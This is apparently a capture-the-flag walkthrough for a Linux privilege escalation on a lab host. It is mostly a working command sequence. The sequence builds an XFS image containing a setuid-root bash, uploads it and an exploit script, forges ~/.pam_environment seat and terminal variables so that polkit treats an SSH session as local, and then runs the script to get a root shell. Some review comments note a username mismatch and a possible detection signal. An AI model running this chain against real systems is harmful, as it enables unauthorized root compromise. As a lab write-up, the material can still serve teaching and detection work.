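# Create 300MB XFS image (run on the local machine).
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash.
# The copy is root-owned because cp runs under sudo; the setuid bit only has
# an effect if the filesystem is later mounted without `nosuid`.
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash   # 4755 = setuid bit + rwxr-xr-x
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

# Upload exploit script and image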
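# NOTE(review): these uploads use the account `abc`, while the logins further
# down use `phileasfogg3`; `abc` is presumably a placeholder - confirm.
scp exp.sh abc@10.129.252.9:~/
scp xfs.image abc@10.129.252.9:~/

# SSH login to target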
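ssh phileasfogg3@10.129.252.9

# Write PAM environment variables.
# pam_env only honours a per-user ~/.pam_environment when `user_readenv` is
# enabled in the PAM stack; with it disabled this file is ignored.
# The two values claim seat0 and virtual terminal 1 for the session -
# presumably so that logind/polkit treat the SSH login as a local one.
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

# Re-login via SSH (PAM config now active)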
ssh phileasfogg3@10.129.252.9

# Ask logind whether this session may reboot the host; "('yes',)" is the
# expected answer once the PAM settings are in effect.
# NOTE(review): a remote SSH session is normally not answered with 'yes'
# here, so this result is also a useful detection signal - confirm against
# the host's polkit policy.
gdbus call --system \
  --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot
# Execute privilege escalation script
bash exp.sh

If exploitation succeeds, you should see:
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
| Issue | Solution |
|---|---|
| `CanReboot` returns `('no',)` | Make sure you logged out and back in (Step 3) |
| Not authorized error | Check `~/.pam_environment` content is correct |
| SUID bash not found | Re-upload xfs.image and verify SUID bit is set |
- ✅ Must logout and re-login: PAM config only takes effect in new sessions
- ✅ Verify CanReboot: Confirm it returns `('yes',)` before running script
- ✅ Use SSH login: Don't use `ssh -t user@host "cmd"` style execution
If it fails, ensure every step is executed strictly in order!